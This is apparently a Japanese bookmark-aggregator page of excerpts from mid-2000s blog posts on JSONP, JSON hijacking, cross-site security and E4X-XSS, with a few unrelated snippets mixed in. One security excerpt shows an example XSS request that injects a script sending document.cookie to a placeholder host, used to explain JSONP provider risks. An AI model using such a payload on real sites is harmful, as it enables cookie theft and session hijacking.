POSTとiframeでAJax - Practice of Programming
SumibiでJSONP使えないかなぁと検討していたんですが、GETだとログに文章が残ってしまうので、 プライバシーがなぁと。kiyokaさんはそのへんに気を遣っているので、僕もあんまりしたくないなぁ...と思ってたんですが。 iframe とPOSTを使ってなんとかなるかなぁとか、思い始めました。 1つでもいいんですが、簡単なんで、iframe を2つ作ります。 <iframe src="sumibi_form.html" id="iframe_sumibi"></iframe> <iframe src="sumibi_form.html" id="iframe_sumibi_target"></iframe>前者の方には、例えば、こんなの。 <html> <head> <title>hoge</title> </head> <body> <form name="test" id="te
Kazuho@Cybozu Labs: 安全な JSON, 危険な JSON (Cross-site Including?)
« クロスサイトのセキュリティモデル | メイン | E4X-XSS 脆弱性について » 2007年01月06日 安全な JSON, 危険な JSON (Cross-site Including?) 先のエントリで、 JSON については、JavaScript として副作用をもたない (もたせようがない) ゆえに文法違反であるがゆえに、秘密情報を含むデータフォーマットとして使用することができるのです。 (Kazuho@Cybozu Labs: クロスサイトのセキュリティモデル) と書いたのですが、認識が甘かったようです。Jeremiah Grossman: Advanced Web Attack Techniques using GMail によると、配列の初期化演算子 [] の動作を外部から変更することができる注1とのこと。 実際に手元の Firefox 1.5 で試してみたところ、JS
GDataのJSONPとコールバック関数名 - snippets from shinichitomita’s journal
GoogleがGDataをJSONでも配信しているわけです。 http://code.google.com/apis/gdata/json.html スクリプト埋め込みでのJSON呼び出しをJSONPとは言わずにJSON-in-scriptと言っているあたりは微妙に気になる。まあこっちの方がよりよく実体を表していそうなネーミングではある。 ただそれよりも、コールバックの関数名に指定できる文字が微妙に制限されているのが気になった。 ちなみにYahooのJSON Webサービスで使える文字は http://developer.yahoo.com/common/json.html Callback function names may only use upper and lowercase alphabetic characters (A-Z, a-z), numbers (0-9), the
Kazuho@Cybozu Labs: クロスサイトのセキュリティモデル
« Japanize - IE 系の User JavaScript エンジンに対応しました | メイン | 安全な JSON, 危険な JSON (Cross-site Including?) » 2007年01月04日 クロスサイトのセキュリティモデル あけましておめでとうございます。 昨年、社内で「XMLHttpRequest は何故クロスサイトで使えないのか。画像や SCRIPT タグは使えるのに」という疑問 (というより試問) を耳にしました。おもしろい話なのでブログネタにしようと思っていたのですが、新年早々 GMAIL の事例がスラッシュドットされていたので、自分の現時点での理解をまとめてみることにしました。文書を確認して書いているわけではないので、間違いがあれば指摘してください。また、よい参考文献をご存知の方がいらっしゃいましたら、教えていただければ幸いです。 ウェブブラウザ
Kazuho@Cybozu Labs: JSONP - データ提供者側のセキュリティについて
« E4X-XSS 脆弱性について | メイン | 「スーパー技術者争奪戦」 » 2007年01月12日 JSONP - データ提供者側のセキュリティについて JSONP のセキュリティは、ともすればインクルードする側についての議論になりがちであり、その影でインクルードされる側のリスクが見過ごされがちです。JSONP の使用にあたっては、データ提供者への XSS に注意する必要があります。脆弱な例としては、以下のようなものがあります。 GET /json.cgi/append.html?padding=%3Cscript%3Elocation='http://example.jp/'%2Bdocument.cookie%3C/script%3E HTTP/1.0 Host: example.com HTTP/1.0 200 OK Content-Type: text/javascript;
Log4J徹底解説~目次
目次 概説 使い方(1) 使い方(2) 基本のAppender ファイル保存系Appender ネットワーク系Appender JMSAppender OSログ系Appender JDBCAppender その他のAppender 1.3で追加されたAppender フィルタ機能 Joran Hacks(1.3) 自前 Appender の書き方!(1.3) Chainsaw(1.3) アスペクトはお好き? Log4cxxと小物ツール Log4php の使い方 Log4php の Appender たち もともとこの文書はバージョン 1.2.8 をベースに書いたものだが、2006年中に 1.3 がリリースされる、とアナウンスされていることもあり、フライングか?と思わなくもないが、1.3 対応をしました! あと、どうも要望のありげな log4php についての記述を大追加! 2007.9.1
Using JSON with Yahoo! Web Services - YDN
Using JSON (JavaScript Object Notation) with Yahoo! Web Services JSON (JavaScript Object Notation) is a lightweight data format based on the object notation of the JavaScript language. It does not require JavaScript to read or write; it is easy to parse by any language and libraries and tools exist in many languages to handle JSON. For a complete description of JSON and its many uses, we sugges
Kazuho@Cybozu Labs: E4X-XSS 脆弱性について
« 安全な JSON, 危険な JSON (Cross-site Including?) | メイン | JSONP - データ提供者側のセキュリティについて » 2007年01月10日 E4X-XSS 脆弱性について Firefox でサポートされている JavaScript 拡張 E4X (ECMA-357) では、JavaScript 内に XML とほぼ同様のマークアップ言語を記述できるようになっています。しかし、マークアップ言語の解釈にはいくつかの違いがあり、この点をついたクロスサイトスクリプティングの可能性が (相当に小さいものの) 存在します。攻撃者は、 ウェブアプリケーションに E4X として解釈した場合に実行コードとして解釈されるコードを注入 (XSS) し、 1 のコンテンツを <script> タグを用いて参照するような別のウェブサイトを用意し、攻撃対象にアクセスさせ
ペット 飼育管理 一生に一度の大切な時期「臨界期」って何だろう? - goo ペット
「猫の新生児の眼に外界からの光を遮断し、10〜14日間その状態を継続すると、猫は完全に盲目化する」 という発表がありました。例え遺伝的に正常な視覚を持って生まれてきても、約2週間以内に光の刺激を受けないと、視覚機能を喪失するというのです。 これは、「視覚の臨界期に適切な刺激を受けなかったことが原因である」ということらしいのですが、ではその「臨界期」とはどのような時期のことを言うのでしょうか? 動物はそれぞれ親から受け継いだ遺伝子を持っています。しかし、その遺伝情報は刺激がなければ正常に機能することはできません。例えば、先ほどの猫の場合、視覚に対する正常な遺伝子はあったものの、視覚に対する刺激が、ある「大切な時期」になかったため、視覚機能が失われたのです。 その「大切な時期」というのが「臨界期(感受性期)」と呼ばれる時期です。 臨界期は、脳の中で覚えたり感じたりする神経回路(ニューロン)
[MM][タグ][API] タグ自動抽出API (13:46) - いしなお! (2005-10-11)
_ タグ自動抽出API (13:46) tDiary: category_to_tagプラグイン より、 つーか、MM/Memoのタグ抽出もAPIになってればいいのに(とかいう)。 入力フォームで呼んでいるJavaScriptのソースを見れば分かるけど、もともとタグ抽出処理はAPIに切り出してあって、こんな感じで呼べるんだけど、最近うちのサーバーはカフカ気味なんで、朝起きると巨大な虫に変わっているんです。じゃなくて、過負荷気味なんでサービスとして提供できるほど安定稼働できるかどうか微妙なんで公開していませんでした。が、使ってみたい人は適当に使ってもかまいません。 http://1470.net/api/mmutil.php?cmd=getwords;url=[URLエンコードしたURL文字列] をコールすると、EUC-JPな文字列をタブ文字区切りで最大20個返します。文字コード判別が腐ると
Yahoo Developer Network
We’re informing you of a mandatory update required on your part if you wish to continue accessing profile (identity) information about Yahoo users using your service(s). Yahoo is shutting down the Yahoo Social Directory API on 6/30/2020. We have created a new UserInfo Endpoint service which you can on-board to now. The new service is only compatible with OAUTH2.0 Tokens. Social Directory EOL OpenI
リリース、障害情報などのサービスのお知らせ
最新の人気エントリーの配信
j次のブックマーク
k前のブックマーク
lあとで読む
eコメント一覧を開く
oページを開く
Yahoo!ニュース
http://www.nilab.info/zurazure2/archives/000468.html
http://www5.hokkaido-np.co.jp/syakai/housyouhi/document/